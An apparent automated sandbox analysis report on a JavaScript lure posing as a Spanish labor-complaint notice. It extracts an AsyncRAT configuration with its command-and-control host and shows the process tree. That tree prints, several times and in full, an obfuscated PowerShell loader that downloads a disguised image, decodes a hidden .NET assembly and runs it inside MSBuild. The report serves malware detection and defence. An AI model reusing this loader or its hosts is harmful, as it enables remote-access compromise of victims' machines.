Analysis
-
max time kernel
244s -
max time network
247s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-es -
resource tags
-
submitted
18-12-2024 14:47
Errors
General
-
Target
https://cdn.discordapp.com/attachments/1318901750698217475/1318901950690889778/NOTIFICACION_DENUNCIA_LABORAL_ADMINISTRATIVO_POR_INCUMPLIMIENTO.js?ex=676402a9&is=6762b129&hm=c7a9369ee3e4a423229d1e006cd638ab4504a362d59775a9ef510acf67e80f83&
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
holadic16.duckdns.org:9003
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Blocklisted process makes network request 10 IoCs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 8 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Drops desktop.ini file(s) 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 58 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 35 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1318901750698217475/1318901950690889778/NOTIFICACION_DENUNCIA_LABORAL_ADMINISTRATIVO_POR_INCUMPLIMIENTO.js?ex=676402a9&is=6762b129&hm=c7a9369ee3e4a423229d1e006cd638ab4504a362d59775a9ef510acf67e80f83&1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb382346f8,0x7ffb38234708,0x7ffb382347182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=5504 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACIÓN DENUNCIA LABORAL ADMINISTRATIVO POR INCUMPLIMIENTO.js"2⤵
- Blocklisted process makes network request
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$tragi = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$Stikine = New-Object System.Net.WebClient;$oppugns = $Stikine.DownloadData($tragi);$afghanistani = [System.Text.Encoding]::UTF8.GetString($oppugns);$recusals = '<<BASE64_START>>';$frankling = '<<BASE64_END>>';$stylites = $afghanistani.IndexOf($recusals);$polyphene = $afghanistani.IndexOf($frankling);$stylites -ge 0 -and $polyphene -gt $stylites;$stylites += $recusals.Length;$giddy = $polyphene - $stylites;$nitrophenols = $afghanistani.Substring($stylites, $giddy);$sensorimuscular = -join ($nitrophenols.ToCharArray() | ForEach-Object { $_ })[-1..-($nitrophenols.Length)];$acefalous = [System.Convert]::FromBase64String($sensorimuscular);$piqueerer = [System.Reflection.Assembly]::Load($acefalous);$sphenotribe = [dnlib.IO.Home].GetMethod('VAI');$sphenotribe.Invoke($null, @('0/kxtaU/d/ee.etsap//:sptth', 'bufonoidea', 'bufonoidea', 'bufonoidea', 'MSBuild', 'bufonoidea', 'bufonoidea','bufonoidea','bufonoidea','bufonoidea','bufonoidea','bufonoidea','1','bufonoidea','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Drops startup file
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reinicio.bat" "5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\shutdown.exeshutdown -r -t 86⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2752 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --service-sandbox-type=service --mojo-platform-channel-handle=6272 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,1072260166115584461,12819267777279404112,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACIÓN DENUNCIA LABORAL ADMINISTRATIVO POR INCUMPLIMIENTO.js"1⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$tragi = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$Stikine = New-Object System.Net.WebClient;$oppugns = $Stikine.DownloadData($tragi);$afghanistani = [System.Text.Encoding]::UTF8.GetString($oppugns);$recusals = '<<BASE64_START>>';$frankling = '<<BASE64_END>>';$stylites = $afghanistani.IndexOf($recusals);$polyphene = $afghanistani.IndexOf($frankling);$stylites -ge 0 -and $polyphene -gt $stylites;$stylites += $recusals.Length;$giddy = $polyphene - $stylites;$nitrophenols = $afghanistani.Substring($stylites, $giddy);$sensorimuscular = -join ($nitrophenols.ToCharArray() | ForEach-Object { $_ })[-1..-($nitrophenols.Length)];$acefalous = [System.Convert]::FromBase64String($sensorimuscular);$piqueerer = [System.Reflection.Assembly]::Load($acefalous);$sphenotribe = [dnlib.IO.Home].GetMethod('VAI');$sphenotribe.Invoke($null, @('0/kxtaU/d/ee.etsap//:sptth', 'bufonoidea', 'bufonoidea', 'bufonoidea', 'MSBuild', 'bufonoidea', 'bufonoidea','bufonoidea','bufonoidea','bufonoidea','bufonoidea','bufonoidea','1','bufonoidea','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACIÓN DENUNCIA LABORAL ADMINISTRATIVO POR INCUMPLIMIENTO.js"1⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$tragi = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$Stikine = New-Object System.Net.WebClient;$oppugns = $Stikine.DownloadData($tragi);$afghanistani = [System.Text.Encoding]::UTF8.GetString($oppugns);$recusals = '<<BASE64_START>>';$frankling = '<<BASE64_END>>';$stylites = $afghanistani.IndexOf($recusals);$polyphene = $afghanistani.IndexOf($frankling);$stylites -ge 0 -and $polyphene -gt $stylites;$stylites += $recusals.Length;$giddy = $polyphene - $stylites;$nitrophenols = $afghanistani.Substring($stylites, $giddy);$sensorimuscular = -join ($nitrophenols.ToCharArray() | ForEach-Object { $_ })[-1..-($nitrophenols.Length)];$acefalous = [System.Convert]::FromBase64String($sensorimuscular);$piqueerer = [System.Reflection.Assembly]::Load($acefalous);$sphenotribe = [dnlib.IO.Home].GetMethod('VAI');$sphenotribe.Invoke($null, @('0/kxtaU/d/ee.etsap//:sptth', 'bufonoidea', 'bufonoidea', 'bufonoidea', 'MSBuild', 'bufonoidea', 'bufonoidea','bufonoidea','bufonoidea','bufonoidea','bufonoidea','bufonoidea','1','bufonoidea','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACIÓN DENUNCIA LABORAL ADMINISTRATIVO POR INCUMPLIMIENTO.js"1⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$tragi = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$Stikine = New-Object System.Net.WebClient;$oppugns = $Stikine.DownloadData($tragi);$afghanistani = [System.Text.Encoding]::UTF8.GetString($oppugns);$recusals = '<<BASE64_START>>';$frankling = '<<BASE64_END>>';$stylites = $afghanistani.IndexOf($recusals);$polyphene = $afghanistani.IndexOf($frankling);$stylites -ge 0 -and $polyphene -gt $stylites;$stylites += $recusals.Length;$giddy = $polyphene - $stylites;$nitrophenols = $afghanistani.Substring($stylites, $giddy);$sensorimuscular = -join ($nitrophenols.ToCharArray() | ForEach-Object { $_ })[-1..-($nitrophenols.Length)];$acefalous = [System.Convert]::FromBase64String($sensorimuscular);$piqueerer = [System.Reflection.Assembly]::Load($acefalous);$sphenotribe = [dnlib.IO.Home].GetMethod('VAI');$sphenotribe.Invoke($null, @('0/kxtaU/d/ee.etsap//:sptth', 'bufonoidea', 'bufonoidea', 'bufonoidea', 'MSBuild', 'bufonoidea', 'bufonoidea','bufonoidea','bufonoidea','bufonoidea','bufonoidea','bufonoidea','1','bufonoidea','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3887055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
152B
MD599afa4934d1e3c56bbce114b356e8a99
SHA13f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA25608e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA51276686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da
-
Filesize
152B
MD5443a627d539ca4eab732bad0cbe7332b
SHA186b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA2561e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d
-
Filesize
217KB
MD5d04206a14ba1f8b53c1df32815003894
SHA18cd2b8d57dc9a4ab7b828fc9fd2774c34be08805
SHA25600b367d9e3c2826aa3535b5ae47b829ac73c9272c0ccd584bf5399a954e8a10a
SHA512855d2b8f221b345dc9e4944c772a9d2935b940c2394776ce0fe2b59cc123d31c8647a0230c034489a60b9ed1507e71a3258cc957dd85f2942c8e8814461c35d8
-
Filesize
1KB
MD5b78dc011a6514ccf5517ff43adaff09b
SHA1f17ff5d4b979668a053d45faf515052b2eaaab6b
SHA256114a1ff594a30f1d6cef3d93a4016cf5ef69c3252d0263a7420761053d17ea93
SHA5123e541e909a62a195be4b72f7fea596cb150808cb95066379caa3bde7f55c8b330a8585cd79ca7a5d60f4f585973162dfe0504a8bfa3fc23a9de6c0e74185b49f
-
Filesize
2KB
MD548a89147846ad084c740e5cc9b5462a7
SHA150c154938530054a6daab1a71b18142538b43d21
SHA256a9244db39e0df49d462a4e12a9186bc5576e80251976f9792ef60c6f62c8212e
SHA512e7462b233e89acc564a0173b05cdffd9c1bc1d8cc551bde3add6b73438fb3aeb4ead8d663b2ab65837f49583e9ae78d6ec96e3afb6706f7382abde4d8688fbc9
-
Filesize
2KB
MD5c7208ee0fcf5556f9f6b7714870d2c90
SHA1e77230e9b6a5f0a4d46a381fc941cab1f836eb6c
SHA2566ae34fc068bb7a7ad6c7c2f8d2cc81a1a4739aba85f7766999f49b5a29c39349
